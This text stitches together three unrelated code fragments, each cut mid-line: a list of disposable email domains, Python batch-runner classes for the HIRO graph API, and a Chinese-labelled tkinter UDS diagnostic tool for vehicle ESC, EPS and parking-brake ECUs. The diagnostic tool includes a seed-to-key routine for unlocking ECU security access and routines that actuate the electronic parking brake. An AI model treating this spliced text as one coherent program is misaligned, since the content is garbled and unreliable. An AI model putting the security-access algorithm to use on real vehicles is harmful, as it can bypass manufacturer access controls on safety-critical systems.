"wscu73sazlccqsir.gq", "wscu73sazlccqsir.ml", "wscu73sazlccqsir.tk", "wsen1.ru", "wsh72eonlzb5swa22.cf", "wsh72eonlzb5swa22.ga", "wsh72eonlzb5swa22.gq", "wsh72eonlzb5swa22.ml", "wsh72eonlzb5swa22.tk", "wt0vkmg1ppm.cf", "wt0vkmg1ppm.ga", "wt0vkmg1ppm.gq", "wt0vkmg1ppm.ml", "wt0vkmg1ppm.tk", "wt2.orangotango.cf", "wtdmugimlyfgto13b.cf", "wtdmugimlyfgto13b.ga", "wtdmugimlyfgto13b.gq", "wtdmugimlyfgto13b.ml", "wtdmugimlyfgto13b.tk", "wteoq7vewcy5rl.cf", "wteoq7vewcy5rl.ga", "wteoq7vewcy5rl.gq", "wteoq7vewcy5rl.ml", "wteoq7vewcy5rl.tk", "wtfdesign.ru", "wu138.club", "wu138.top", "wu158.club", "wu158.top", "wu189.top", "wu8vx48hyxst.cf", "wu8vx48hyxst.ga", "wu8vx48hyxst.gq", "wu8vx48hyxst.ml", "wu8vx48hyxst.tk", "wudet.men", "wuespdj.xyz", "wuyc41hgrf.cf", "wuyc41hgrf.ga", "wuyc41hgrf.gq", "wuyc41hgrf.ml", "wuyc41hgrf.tk", "wuzup.net", "wuzupmail.net", "wvl238skmf.com", "wvppz7myufwmmgh.cf", "wvppz7myufwmmgh.ga", "wvppz7myufwmmgh.gq", "wvppz7myufwmmgh.ml", "wvppz7myufwmmgh.tk", "wvpzbsx0bli.cf", "wvpzbsx0bli.ga", "wvpzbsx0bli.gq", "wvpzbsx0bli.ml", "wvpzbsx0bli.tk", "wvrdwomer3arxsc4n.cf", "wvrdwomer3arxsc4n.ga", "wvrdwomer3arxsc4n.gq", "wvrdwomer3arxsc4n.tk", "wwatme7tpmkn4.cf", "wwatme7tpmkn4.ga", "wwatme7tpmkn4.gq", "wwatme7tpmkn4.tk", "wwjltnotun30qfczaae.cf", "wwjltnotun30qfczaae.ga", "wwjltnotun30qfczaae.gq", "wwjltnotun30qfczaae.ml", "wwjltnotun30qfczaae.tk", "wwpshop.com", "www.barryogorman.com", "www.bccto.me", "www.dmtc.edu.pl", "www.gishpuppy.com", "wwweb.cf", "wwweb.ga", "wwwmail.gq", "wwwnew.eu", "wyvernia.net", "wzxmtb3stvuavbx9hfu.cf", "wzxmtb3stvuavbx9hfu.ga", "wzxmtb3stvuavbx9hfu.gq", "wzxmtb3stvuavbx9hfu.ml", "wzxmtb3stvuavbx9hfu.tk", "x-izvestiya.ru", "x-mail.cf", "x-mule.cf", "x-mule.ga", "x-mule.gq", "x-mule.ml", "x-mule.tk", "x-new-ru-news.ru", "x-rugazeta.ru", "x-runovosti.ru", "x-rutochka.ru", "x-vestnik.ru", "x.nadazero.net", "x.tonno.cf", "x.tonno.gq", "x.tonno.ml", "x.tonno.tk", "x0zj6k8.com", "x13x13x13.com", "x1bkskmuf4.cf", "x1bkskmuf4.ga", "x1bkskmuf4.gq", "x1bkskmuf4.ml", "x1bkskmuf4.tk", "x1cult.ru", "x1econ.ru", "x1news.ru", "x1sci.ru", "x1x22716.com", "x24.com", "x2ewzd983ene0ijo8.cf", "x2ewzd983ene0ijo8.ga", "x2ewzd983ene0ijo8.gq", "x2ewzd983ene0ijo8.ml", "x2ewzd983ene0ijo8.tk", "x2fsqundvczas.cf", "x2fsqundvczas.ga", "x2fsqundvczas.gq", "x2fsqundvczas.ml", "x2fsqundvczas.tk", "x2news.ru", "x2science.ru", "x3gsbkpu7wnqg.cf", "x3gsbkpu7wnqg.ga", "x3gsbkpu7wnqg.gq", "x3gsbkpu7wnqg.ml", "x4y.club", "x5a9m8ugq.com", "x5bj6zb5fsvbmqa.ga", "x5bj6zb5fsvbmqa.ml", "x5bj6zb5fsvbmqa.tk", "x7tzhbikutpaulpb9.cf", "x7tzhbikutpaulpb9.ga", "x7tzhbikutpaulpb9.gq", "x7tzhbikutpaulpb9.ml", "x8h8x941l.com", "x8vplxtmrbegkoyms.cf", "x8vplxtmrbegkoyms.ga", "x8vplxtmrbegkoyms.gq", "x8vplxtmrbegkoyms.ml", "x8vplxtmrbegkoyms.tk", "x9dofwvspm9ll.cf", "x9dofwvspm9ll.ga", "x9dofwvspm9ll.gq", "x9dofwvspm9ll.ml", "x9dofwvspm9ll.tk", "xa9f9hbrttiof1ftean.cf", "xa9f9hbrttiof1ftean.ga", "xa9f9hbrttiof1ftean.gq", "xa9f9hbrttiof1ftean.ml", "xa9f9hbrttiof1ftean.tk", "xagloo.com", "xas04oo56df2scl.cf", "xas04oo56df2scl.ga", "xas04oo56df2scl.gq", "xas04oo56df2scl.ml", "xas04oo56df2scl.tk", "xaxx.ml", "xbaby69.top", "xbm7bx391sm5owt6xe.cf", "xbm7bx391sm5owt6xe.ga", "xbm7bx391sm5owt6xe.gq", "xbm7bx391sm5owt6xe.ml", "xbm7bx391sm5owt6xe.tk", "xbmyv8qyga0j9.cf", "xbmyv8qyga0j9.ga", "xbmyv8qyga0j9.gq", "xbmyv8qyga0j9.ml", "xbmyv8qyga0j9.tk", "xbvrfy45g.ga", "xbziv2krqg7h6.cf", "xbziv2krqg7h6.ga", "xbziv2krqg7h6.gq", "xbziv2krqg7h6.ml", "xbziv2krqg7h6.tk", "xc05fypuj.com", "xc40.cf", "xc40.ga", "xc40.gq", "xc40.ml", "xc40.tk", "xc60.cf",
not found or empty in attributes and cannot be determined by any \"{}\"".format(id_key, xid_key)) return ogit_id @staticmethod def get_and_check(attributes: dict, key: str, name: str = 'attributes') -> Any: """ Raise ValueError when key is not in attributes or the value behind the key is empty. :param attributes: Dict of attributes. :param key: The key to look for in *attributes*. :param name: Name of the attributes dict. Default is 'attributes'. :return: the value in *attributes* of the key. :raises ValueError: When 'key' does not exist in *attributes*. """ attribute = attributes.get(key) if not attribute: raise SourceValueError("\"{}\" not found or empty in \"{}\".".format(key, name)) return attribute @staticmethod def for_each_attribute(attributes: dict, *funcs) -> dict: """ Iterate over *attributes* and apply a list of functions to each item. Skips any attribute whose key is empty or starts with '_'. Returns a dict with the results after the *funcs* have been applied, leaving the original *attributes* unchanged. :param attributes: Dict of attributes. :param funcs: Set of functions to apply to each element of *attributes*. :return: The resulting copy of *attributes* """ result = {} for key, value in attributes.items(): if not key or key[0] == '_': continue for func in funcs: key, value = func(key, value) if key is None: break if key is not None: result[key] = value return result def resolve_ids(self, key: str, value: str) -> Tuple[str, str]: """ To be used with self.for_each_attribute() Try to resolve_ids keys that start with "id:" or "xid:". Try to find the ogit/_id of a vertex by using the value for such a key in the graph. Return a tuple of (key, value) with the key without its prefix "id:" or "xid:" and the value resolved to a real "ogit/_id". :param key: Attribute key :param value: Attribute value :return: The changed tuple (key, value). """ if key.startswith("xid:"): ogit_id = self.get_id_by_xid(value) if ogit_id is None or not ogit_id: raise ValueError( "Cannot resolve xid \"{}\" of \"{}\".".format(value, key)) return key[4:], ogit_id elif key.startswith("id:"): ogit_id = self.check_id(value) if ogit_id is None or not ogit_id: raise ValueError( "Cannot find id \"{}\" of \"{}\".".format(value, key)) return key[3:], ogit_id else: return key, value @staticmethod def sanitize_for_update(key: str, value: str) -> Tuple[Optional[str], Optional[str]]: """ To be used with self.for_each_attribute() Return (None, None) when key starts with "ogit/_" unless "ogit/_owner", "ogit/_content" or "ogit/_tags". :param key: Attribute key :param value: Attribute value :return: The changed tuple (key, value) or (None, None) when this item should be skipped. """ if key.startswith("ogit/_") and key not in ["ogit/_owner", "ogit/_content", "ogit/_tags"]: return None, None return key, value @staticmethod def success_message(entity: Entity, action: Action, order: int, data: dict) -> dict: """ Success message format :: { "status": "success", "entity": entity.value, "action": action.value, "order": order, "data": data } :param entity: Entity handled :param action: Action done :param data: JSON to return :param order: Running number of commands. :return: The message """ return { "status": Result.SUCCESS.value, "entity": entity.value, "action": action.value, "order": order, "data": data } @staticmethod def error_message(entity: Entity, action: Action, order: int, error: Exception, original: Optional[dict], status_code: int = None, interrupted: bool = None) -> dict: """ Failure message format :: { "status": "fail", "entity": entity.value, "action": action.value, "order": order, "data": { "error": error.__class__.__name__, "message": str(error), "original_data": original } } :param entity: Entity handled :param action: Action done :param order: Running number of commands. :param error: The exception raised :param original: The data that lead to the exception :param status_code: HTTP status code if available :param interrupted: Indicates, that the current batch processing has been interrupted. :return: The message """ message = str(error) if interrupted: message = "BATCH PROCESSING ABORTED! " + message + \ " All further data has been ignored after this error occurred." return { "status": Result.FAILURE.value, "entity": entity.value, "action": action.value, "order": order, "data": { "error": error.__class__.__name__, "code": status_code, "message": message, "original_data": original } } def run(self, attributes: dict, order: int, result_queue: queue.Queue) -> None: """ Run the Command with all data given by *attributes*. This is the enclosing code for all batch runners. The implementation of a handling a single entry of the *attributes* is defined in derived ...Runner-classes. :param attributes: Dict with attributes to handle in HIRO. :param order: Number of the command read from the *self._request_queue*. :param result_queue: Queue receiving the results. """ try: response: dict = self.run_item(attributes) response_code = 200 message = self.success_message(self.entity, self.action, order, response) except RequestException as error: response_code = error.response.status_code if error.response is not None else 999 message = self.error_message(self.entity, self.action, order, error, attributes, response_code) except SourceValueError as error: response_code = 400 message = self.error_message(self.entity, self.action, order, error, attributes, 400) except Exception as error: response_code = 500 message = self.error_message(self.entity, self.action, order, error, attributes, 500) result_queue.put((message, response_code, order)) @abstractmethod def run_item(self, attributes: dict) -> dict: """ Abstract method overwritten by derived runner classes. :param attributes: A dict of attributes to handle. :return: A response dict - usually directly the structure received from the backend. """ raise RuntimeError("Cannot call abstract method 'run_item()' within HiroCommandBatch directly.") class CreateVerticesRunner(HiroBatchRunner): """ Create vertices """ def __init__(self, session_data: SessionData, connection: HiroGraph): """ Create vertices :param session_data: Required: Session data / caches. :param connection: Required: The handler for the connection to HIRO HiroGraph. """ super().__init__(Entity.VERTEX, Action.CREATE, session_data, connection) def run_item(self, attributes: dict) -> dict: """ :param attributes: A dict of attributes to create a vertex from. :return: A response dict - usually directly the structure received from the backend. """ ogit_type = self.get_and_check(attributes, "ogit/_type") final_attributes = self.for_each_attribute(attributes, self.resolve_ids) response: dict = self.connection.create_node(final_attributes, ogit_type) self.session_data.register_response(attributes, response) return response class UpdateVerticesRunner(HiroBatchRunner): """ Update vertices """ def __init__(self, session_data: SessionData, connection: HiroGraph): """ Update vertices :param session_data: Required: Session data / caches. :param connection: Required: The handler for the connection to HIRO HiroGraph. """ super().__init__(Entity.VERTEX, Action.UPDATE, session_data, connection) def run_item(self, attributes: dict) -> dict: """ :param attributes: A dict of attributes to update a vertex from. :return: A response dict - usually directly the structure received from the backend. """ ogit_id = self.get_and_check_vertex_id(attributes) final_attributes = self.for_each_attribute(attributes, self.resolve_ids, self.sanitize_for_update) response: dict = self.connection.update_node(ogit_id, final_attributes) self.session_data.register_response(attributes, response) return response class DeleteVerticesRunner(HiroBatchRunner): """ Delete vertices """ def __init__(self, session_data: SessionData, connection: HiroGraph): """ Delete vertices :param session_data: Required: Session data / caches. :param connection: Required: The handler for the connection to HIRO HiroGraph. """ super().__init__(Entity.VERTEX, Action.DELETE, session_data, connection) def run_item(self, attributes: dict) -> dict: """ :param attributes: A dict of attributes to delete a vertex from. :return: A response dict - usually directly the structure received from the backend. """ ogit_id = self.get_and_check_vertex_id(attributes) response: dict = self.connection.delete_node(ogit_id) self.session_data.unregister_by_response(response) return response class HandleVerticesRunner(HiroBatchRunner): """ Handle vertices. Either update or create them based on incoming payload entries. """ def __init__(self, session_data: SessionData, connection: HiroGraph): """ Handle vertices. Either update or create them based on incoming payload entries. :param session_data: Required: Session data / caches. :param connection: Required: The handler for the connection to HIRO HiroGraph. """ super().__init__(Entity.VERTEX, Action.UNDEFINED, session_data, connection) def run_item(self, attributes: dict) -> dict: """ :param attributes: A dict of attributes to handle a vertex from. Updates the vertex when it can be found via ogit/_id or ogit/_xid, creates the vertex otherwise when ogit/_type is present. :return: A response dict - usually directly the structure received from the backend. """ self.action = Action.UNDEFINED ogit_id = self.get_vertex_id(attributes) self.action = Action.UPDATE if ogit_id else Action.CREATE if self.action == Action.CREATE: ogit_type = self.get_and_check(attributes, "ogit/_type") final_attributes = self.for_each_attribute(attributes, self.resolve_ids) response: dict = self.connection.create_node(final_attributes, ogit_type) else: final_attributes = self.for_each_attribute(attributes, self.resolve_ids, self.sanitize_for_update) response: dict = self.connection.update_node(ogit_id, final_attributes) self.session_data.register_response(attributes, response) return response class CreateEdgesRunner(HiroBatchRunner): """ Create edges between vertices """ def __init__(self, session_data: SessionData, connection: HiroGraph): """ Create edges between vertices :param session_data: Required: Session data / caches. :param connection: Required: The handler for the connection to HIRO HiroGraph. """ super().__init__(Entity.EDGE, Action.CREATE, session_data, connection) def run_item(self, attributes: dict) -> dict: """ :param attributes: A dict of attributes to create edges from. :return: A response dict -
self.strvReleaseEPB.set("释放电子卡钳") self.btnReleaseEPB = ttk.Button(self.frameesc, textvariable=self.strvReleaseEPB, command=self.BtnReleaseEPB_Click) self.btnReleaseEPB.grid(row=2, column=0, padx=3, pady=3) self.btnReleaseEPB["state"] = tk.DISABLED self.strvApplyEPB = tk.StringVar() self.strvApplyEPB.set("夹紧电子卡钳") self.btnApplyEPB = ttk.Button(self.frameesc, textvariable=self.strvApplyEPB, command=self.BtnApplyEPB_Click) self.btnApplyEPB.grid(row=2, column=1, padx=3, pady=3) self.btnApplyEPB["state"] = tk.DISABLED self.swpath4show = tk.StringVar() tk.Label(self.frameesc, text = "ESC软件路径:").grid(row = 8, column = 0) tk.Entry(self.frameesc, textvariable = self.swpath4show).grid(row = 8, column = 1) self.btnFilePath = ttk.Button(self.frameesc, text = "sw路径选择", command = self.BtnSelectSwPath_Click) self.btnFilePath.grid(row = 8, column = 2, padx=5, pady=5) self.bootpath4show = tk.StringVar() tk.Label(self.frameesc, text = "boot软件路径:").grid(row = 9, column = 0) tk.Entry(self.frameesc, textvariable = self.bootpath4show).grid(row = 9, column = 1) self.btnFilePath = ttk.Button(self.frameesc, text = "boot路径选择", command = self.BtnSelectBootPath_Click) self.btnFilePath.grid(row = 9, column = 2, padx=5, pady=5) self.btnSwFlash = ttk.Button(self.frameesc, text = "开始刷写", command = self.BtnSwFlash_Click) self.btnSwFlash.grid(row = 10, column = 0, columnspan=2, padx=10, pady=10) self.btnSwFlash["state"] = tk.DISABLED self.strvResetECU = tk.StringVar() self.strvResetECU.set("重启ECU") self.btnResetECU = ttk.Button(self.frameesc, textvariable=self.strvResetECU, command=self.BtnResetECU_Click) self.btnResetECU.grid(row=7, column=0, padx=3, pady=3) self.btnResetECU["state"] = tk.DISABLED #EPS part####################################################################### self.strvCaliEPS2wd = tk.StringVar() self.strvCaliEPS2wd.set("C11两驱SAS中位标定") self.btnCaliEPS2wd = ttk.Button(self.frameeps, textvariable=self.strvCaliEPS2wd, command=self.BtnCaliEPS2wd_Click) self.btnCaliEPS2wd.grid(row=0, column=0, padx=3, pady=3) self.btnCaliEPS2wd["state"] = tk.DISABLED self.strvCaliEPS4wd = tk.StringVar() self.strvCaliEPS4wd.set("C11四驱SAS中位标定") self.btnCaliEPS4wd = ttk.Button(self.frameeps, textvariable=self.strvCaliEPS4wd, command=self.BtnCaliEPS4wd_Click) self.btnCaliEPS4wd.grid(row=1, column=0, padx=3, pady=3) self.btnCaliEPS4wd["state"] = tk.DISABLED self.strvDeCaliEPS4wd = tk.StringVar() self.strvDeCaliEPS4wd.set("C11四驱SAS中位解标") self.btnDeCaliEPS4wd = ttk.Button(self.frameeps, textvariable=self.strvDeCaliEPS4wd, command=self.BtnDeCaliEPS4wd_Click) self.btnDeCaliEPS4wd.grid(row=1, column=1, padx=3, pady=3) self.btnDeCaliEPS4wd["state"] = tk.DISABLED #diag test part################################################################ self._v = IntVar() self.Radioesc = Radiobutton(self.frametest,text='ESC',variable=self._v,value=1) #TODO. need to add function for switching addressing self.Radioesc.grid(row=0, column=0, padx=3, pady=3) self.Radioeps = Radiobutton(self.frametest,text='EPS',variable=self._v,value=2) self.Radioeps.grid(row=0, column=1, padx=3, pady=3) self.Radioepb = Radiobutton(self.frametest,text='EPB',variable=self._v,value=3) self.Radioepb.grid(row=0, column=2, padx=3, pady=3) self.testlog = tk.Text(self.frametest, width=70, height=30) self.testlog.grid(row=2, column=0, rowspan=10, columnspan=10) self.btnAutoDiagTest = ttk.Button(self.frametest, text="开始测试", command=self.BtnAutoDiagTest_Click) self.btnAutoDiagTest.grid(row=13, column=0, padx=3, pady=3) self.btnAutoDiagTest["state"] = tk.DISABLED self.btnExportReport = ttk.Button(self.frametest, text="输出测试报告", command=self.BtnExportReport_Click) self.btnExportReport.grid(row=13, column=1, padx=3, pady=3) self.btnExportReport["state"] = tk.DISABLED self.btnClrReport = ttk.Button(self.frametest, text="清空屏幕", command=self.BtnClrReport_Click) self.btnClrReport.grid(row=13, column=2, padx=3, pady=3) self.btnClrReport["state"] = tk.DISABLED ############################################################################### ### Function ############################################################################### def ChnInfoUpdate(self, is_open): #通道信息获取 cur_dev_info = self._dev_info[self.cmbDevType.get()] cur_chn_info = cur_dev_info["chn_info"] if is_open: # 通道 self.cmbCANChn["value"] = tuple([i for i in range(cur_dev_info["chn_num"])]) self.cmbCANChn.current(0) # 工作模式 self.cmbCANMode["value"] = ("正常模式", "只听模式") self.cmbCANMode.current(0) # 波特率 self.cmbBaudrate["value"] = tuple([brt for brt in cur_chn_info["baudrate"].keys()]) self.cmbBaudrate.current(len(self.cmbBaudrate["value"]) - 3) if cur_chn_info["is_canfd"] == True: # 数据域波特率 self.cmbDataBaudrate["value"] = tuple([brt for brt in cur_chn_info["data_baudrate"].keys()]) self.cmbDataBaudrate.current(0) self.cmbDataBaudrate["state"] = "readonly" if cur_chn_info["sf_res"] == True: self.cmbResEnable["value"] = ("使能", "失能") self.cmbResEnable.current(0) self.cmbResEnable["state"] = "readonly" # 是否启用UDS协议 self.cmbUDSEnable["value"] = ("是", "否") self.cmbUDSEnable.current(0) self.cmbUDSEnable["state"] = "readonly" self.btnCANCtrl["state"] = tk.NORMAL else: self.cmbCANChn["state"] = tk.DISABLED self.cmbCANMode["state"] = tk.DISABLED self.cmbBaudrate["state"] = tk.DISABLED self.cmbDataBaudrate["state"] = tk.DISABLED self.cmbResEnable["state"] = tk.DISABLED self.cmbUDSEnable["state"] = tk.DISABLED self.cmbCANChn["value"] = () self.cmbCANMode["value"] = () self.cmbBaudrate["value"] = () self.cmbDataBaudrate["value"] = () self.cmbResEnable["value"] = () self.cmbUDSEnable["value"] = () self.btnCANCtrl["state"] = tk.DISABLED def ChnInfoDisplay(self, enable): if enable: self.cmbCANChn["state"] = "readonly" self.cmbCANMode["state"] = "readonly" self.cmbBaudrate["state"] = "readonly" if self._is_canfd: self.cmbDataBaudrate["state"] = "readonly" if self._res_support: self.cmbResEnable["state"] = "readonly" self.cmbUDSEnable["state"] = "readonly" else: self.cmbCANChn["state"] = tk.DISABLED self.cmbCANMode["state"] = tk.DISABLED self.cmbBaudrate["state"] = tk.DISABLED self.cmbDataBaudrate["state"] = tk.DISABLED self.cmbResEnable["state"] = tk.DISABLED self.cmbUDSEnable["state"] = tk.DISABLED def DevInfoRead(self): info = self._zcan.GetDeviceInf(self._dev_handle) if info != None: self.strvHwVer.set(info.hw_version) self.strvFwVer.set(info.fw_version) self.strvDrVer.set(info.dr_version) self.strvInVer.set(info.in_version) self.strvCANNum.set(str(info.can_num)) self.strvSerial.set(info.serial) self.strvHwType.set(info.hw_type) def DevInfoClear(self): self.strvHwVer.set('') self.strvFwVer.set('') self.strvDrVer.set('') self.strvInVer.set('') self.strvCANNum.set('') self.strvSerial.set('') self.strvHwType.set('') def MsgBox4Dtc(self, dtcs): self.DTCBox = tk.Toplevel() self.DTCBox.geometry('320x400') self.DTCBox.title('故障列表') if dtcs is not None: for i in range(min(len(dtcs),16)): tk.Label(self.DTCBox, anchor= tk.W, text=i).grid(row=i, column=0,sticky=tk.W) tk.Label(self.DTCBox, anchor=tk.W, text=hex(dtcs[i].id)).grid(row=i, column=1,sticky=tk.W) if hex(dtcs[i].id) in self._DTCList.keys(): tk.Label(self.DTCBox, anchor=tk.W, text=self._DTCList[hex(dtcs[i].id)]).grid(row=i, column=2,sticky=tk.W) else: tk.Label(self.DTCBox, anchor=tk.W, text="unknow DTC").grid(row=i, column=2,sticky=tk.W) #Clear DTC self.btnClrDTC = ttk.Button(self.DTCBox, textvariable=self.strvClrDTC, command=self.BtnClearDTC_Click) self.btnClrDTC.grid(row= min(len(dtcs),16)+1, column=0, columnspan=3, pady=2) else: tk.Label(self.DTCBox, anchor= tk.N, text="无故障! :)") self.btnReadDTC["state"] = tk.DISABLED #disable reading DTC to avoid multi DTC windows self.DTCBox.protocol('WM_DELETE_WINDOW', self.CloseDTCBox) #enable reading DTC again def CloseDTCBox(self): self.btnReadDTC["state"] = tk.NORMAL self.DTCBox.destroy() def SecAlgo(self, level, seed, params): """ Builds the security key to unlock a security level. temp_key = bytearray(seed) self.output_key = bytearray(seed) xorkey = bytearray(params['xorkey']) for i in range(len(temp_key)): temp_key[i] = temp_key[i] ^ xorkey[i] self.output_key[0] = (temp_key[3] & 0x0F) | (temp_key[2] & 0xF0) self.output_key[1] = ((temp_key[2] & 0x1F) << 3) | ((temp_key[1] & 0xF8) >> 3) self.output_key[2] = ((temp_key[1] & 0xFC) >> 2) | (temp_key[0] & 0xC0) self.output_key[3] = ((temp_key[0] & 0x0F) << 4) | (temp_key[3] & 0x0F) """ temp_key = (seed[0]<<24) | (seed[1] << 16) | (seed[2] << 8) | (seed[3]) if level == 0x01: output_key_temp = ((((temp_key >> 4) ^ temp_key) << 3) ^ temp_key) & 0xFFFFFFFF elif level == 0x11: _temp_y = ((temp_key<<24) & 0xFF000000) + ((temp_key<<8) & 0xFF0000) + ((temp_key>>8) & 0xFF00) + ((temp_key>>24) & 0xFF) _temp_z = 0 _temp_sum = 0 for i in range(64): _temp_y += ((((_temp_z<<4) ^ (_temp_z>>5)) + _temp_z) ^ (_temp_sum + params[_temp_sum&0x3])) & 0xFFFFFFFF _temp_y = _temp_y & 0xFFFFFFFF _temp_sum += 0x8F750A1D _temp_sum = _temp_sum & 0xFFFFFFFF _temp_z += ((((_temp_y<<4) ^ (_temp_y>>5)) + _temp_y) ^ (_temp_sum + params[(_temp_sum>>11)&0x3])) & 0xFFFFFFFF _temp_z = _temp_z & 0xFFFFFFFF output_key_temp = (((_temp_z<<24) & 0xFF000000) | ((_temp_z<<8) & 0xFF0000) | ((_temp_z>>8) & 0xFF00) | ((_temp_z>>24) & 0xFF)) else: output_key_temp = temp_key output_key = struct.pack('BBBB', (output_key_temp>>24)&0xFF, (output_key_temp>>16)&0xFF, (output_key_temp>>8)&0xFF, output_key_temp&0xFF) return output_key def getDateTimeBytes(self): """ get year/month/day and convert into bytes """ _year_high = int(str(datetime.datetime.now().year), 16) >> 8 _year_low = int(str(datetime.datetime.now().year), 16) & 0xFF _month = int(str(datetime.datetime.now().month), 16) _day = int(str(datetime.datetime.now().day), 16) _hour = int(str(datetime.datetime.now().hour), 16) _minute = int(str(datetime.datetime.now().minute), 16) _second = int(str(datetime.datetime.now().second), 16) return (_year_high, _year_low, _month, _day, _hour, _minute, _second) ############################################################################### ### Event handers ############################################################################### def Form_OnClosing(self): if self._isOpen: self.btnDevCtrl.invoke() self.destroy() def BtnOpenDev_Click(self): if self._isOpen: #Close Channel if self._isChnOpen: self.btnCANCtrl.invoke() #Close Device self._zcan.CloseDevice(self._dev_handle) self.DevInfoClear() self.strvDevCtrl.set("打开") self.cmbDevType["state"] = "readonly" self.cmbDevIdx["state"] = "readonly" self._isOpen = False else: self._cur_dev_info = self._dev_info[self.cmbDevType.get()] #Open Device self._dev_handle = self._zcan.OpenDevice(self._cur_dev_info["dev_type"], self.cmbDevIdx.current(), 0) if self._dev_handle == INVALID_DEVICE_HANDLE: #Open failed messagebox.showerror(title="打开设备", message="打开设备失败!") return #Update Device Info Display self.DevInfoRead() self._is_canfd = self._cur_dev_info["chn_info"]["is_canfd"] self._res_support = self._cur_dev_info["chn_info"]["sf_res"] self.strvDevCtrl.set("关闭") self.cmbDevType["state"] = tk.DISABLED self.cmbDevIdx["state"] = tk.DISABLED self._isOpen = True self.ChnInfoUpdate(self._isOpen) self.ChnInfoDisplay(self._isOpen) def BtnOpenCAN_Click(self): if self._isChnOpen: #wait read_thread exit self._terminated = True #Close channel self._zcan.ResetCAN(self._can_handle) self.strvCANCtrl.set("打开") self._isChnOpen = False self.udsclient.close() else: #Initial channel if self._res_support: #resistance enable ip = self._zcan.GetIProperty(self._dev_handle) self._zcan.SetValue(ip, str(self.cmbCANChn.current()) + "/initenal_resistance", '1' if self.cmbResEnable.current() == 0 else '0') self._zcan.ReleaseIProperty(ip) #set usbcan-e-u baudrate if self._cur_dev_info["dev_type"] in USBCAN_XE_U_TYPE: ip = self._zcan.GetIProperty(self._dev_handle) self._zcan.SetValue(ip, str(self.cmbCANChn.current()) + "/baud_rate", self._cur_dev_info["chn_info"]["baudrate"][self.cmbBaudrate.get()]) self._zcan.ReleaseIProperty(ip) #set usbcanfd clock if self._cur_dev_info["dev_type"] in USBCANFD_TYPE: ip = self._zcan.GetIProperty(self._dev_handle) self._zcan.SetValue(ip, str(self.cmbCANChn.current()) + "/clock", "60000000") self._zcan.ReleaseIProperty(ip) chn_cfg = ZCAN_CHANNEL_INIT_CONFIG() chn_cfg.can_type = ZCAN_TYPE_CANFD if self._is_canfd else ZCAN_TYPE_CAN if self._is_canfd: chn_cfg.config.canfd.mode = self.cmbCANMode.current() chn_cfg.config.canfd.abit_timing = self._cur_dev_info["chn_info"]["baudrate"][self.cmbBaudrate.get()] chn_cfg.config.canfd.dbit_timing = self._cur_dev_info["chn_info"]["data_baudrate"][self.cmbDataBaudrate.get()] else: chn_cfg.config.can.mode = self.cmbCANMode.current() if self._cur_dev_info["dev_type"] in USBCAN_I_II_TYPE: brt = self._cur_dev_info["chn_info"]["baudrate"][self.cmbBaudrate.get()] chn_cfg.config.can.timing0 = brt["timing0"] chn_cfg.config.can.timing1 = brt["timing1"] chn_cfg.config.can.acc_code = 0 chn_cfg.config.can.acc_mask = 0xFFFFFFFF self._can_handle = self._zcan.InitCAN(self._dev_handle, self.cmbCANChn.current(), chn_cfg) if self._can_handle == INVALID_CHANNEL_HANDLE: messagebox.showerror(title="打开通道", message="初始化通道失败!") return ret = self._zcan.StartCAN(self._can_handle) if ret != ZCAN_STATUS_OK: messagebox.showerror(title="打开通道", message="打开通道失败!") return #start receive thread if self.cmbUDSEnable.get() == '是': self.udsclient.open() self._terminated = False else: pass self.strvCANCtrl.set("关闭") self._isChnOpen = True self.btnReadDTC["state"] = tk.NORMAL self.btnResetECU["state"] = tk.NORMAL self.btnClrDTC_1["state"] = tk.NORMAL self.btnReadSwVer["state"] = tk.NORMAL self.btnINSCali["state"] = tk.NORMAL self.btnC11Config["state"] = tk.NORMAL self.btnReleaseEPB["state"] = tk.NORMAL self.btnApplyEPB["state"] = tk.NORMAL self.btnAutoDiagTest["state"] = tk.NORMAL self.btnExportReport["state"] = tk.NORMAL self.btnClrReport["state"] = tk.NORMAL #self.btnSwFlash["state"] = tk.NORMAL self.btnCaliEPS2wd["state"] = tk.NORMAL self.btnCaliEPS4wd["state"] = tk.NORMAL self.btnDeCaliEPS4wd["state"] = tk.NORMAL self.ChnInfoDisplay(not self._isChnOpen) def onTabChange(self, event): #if self.gbDiag == self.tabesc: if event.widget.index("current") == 0: self.isotp_layer.set_address(self._isotpaddr_PHYS) print("INFO:Setting address ESP") #elif self.gbDiag == self.tabeps: elif event.widget.index("current") == 1: self.isotp_layer.set_address(self._isotpaddr_EPS) print("INFO:Setting address EPS") elif self.gbDiag == self.tabepb: pass def BtnReadDTC_Click(self): #self.udsclient.change_session(1) #try: response = self.udsclient.get_dtc_by_status_mask(9) self.MsgBox4Dtc(response.service_data.dtcs) #except: #messagebox.showerror(title="读取故障码", message="读取故障码失败!") def BtnClearDTC_Click(self): #self.udsclient.change_session(1) response = self.udsclient.clear_dtc(0xFFFFFF) if response.positive and self.DTCBox is not None: self.DTCBox.destroy() self.BtnReadDTC_Click() def BtnReadSwVer_Click(self): self.udsclient.change_session(3) self.udsclient.unlock_security_access(1) resp = self.udsclient.read_data_by_identifier(0xF195) print(resp) def BtnResetECU_Click(self): self.udsclient.ecu_reset(1) def BtnINSCali_Click(self): self.udsclient.change_session(1) try: self.udsclient.change_session(3) self.udsclient.unlock_security_access(1) resp_1 = self.udsclient.start_routine(routine_id = 0xF001) resp_2 = self.udsclient.start_routine(routine_id = 0xF002) if resp_1.positive & resp_2.positive: messagebox.showinfo(title='INS Calibration', message='INS标定成功!') except: messagebox.showerror(title="INS Calibration", message="INS标定失败!") def BtnC11Config_Click(self): self.udsclient.change_session(1) try: self.udsclient.change_session(3) self.udsclient.unlock_security_access(1) #resp_2 = self.udsclient.write_data_by_identifier(did = 0xF190, value = 0x0F) resp_1 = self.udsclient.write_data_by_identifier(did = 0xF1A8, value = 0x0F) if resp_1.positive : messagebox.showinfo(title='Variant Confiuration', message='Confiure Success!') except: messagebox.showerror(title="Variant Confiuration", message="Confiure Failed!") def BtnReleaseEPB_Click(self): self.udsclient.change_session(3) self.udsclient.unlock_security_access(1) resp_1 = self.udsclient.start_routine(routine_id = 0xF102) print(resp_1) def BtnApplyEPB_Click(self): self.udsclient.change_session(3) self.udsclient.unlock_security_access(1) resp_1 = self.udsclient.start_routine(routine_id = 0xF105) print(resp_1) def BtnSelectSwPath_Click(self): self.swpath =
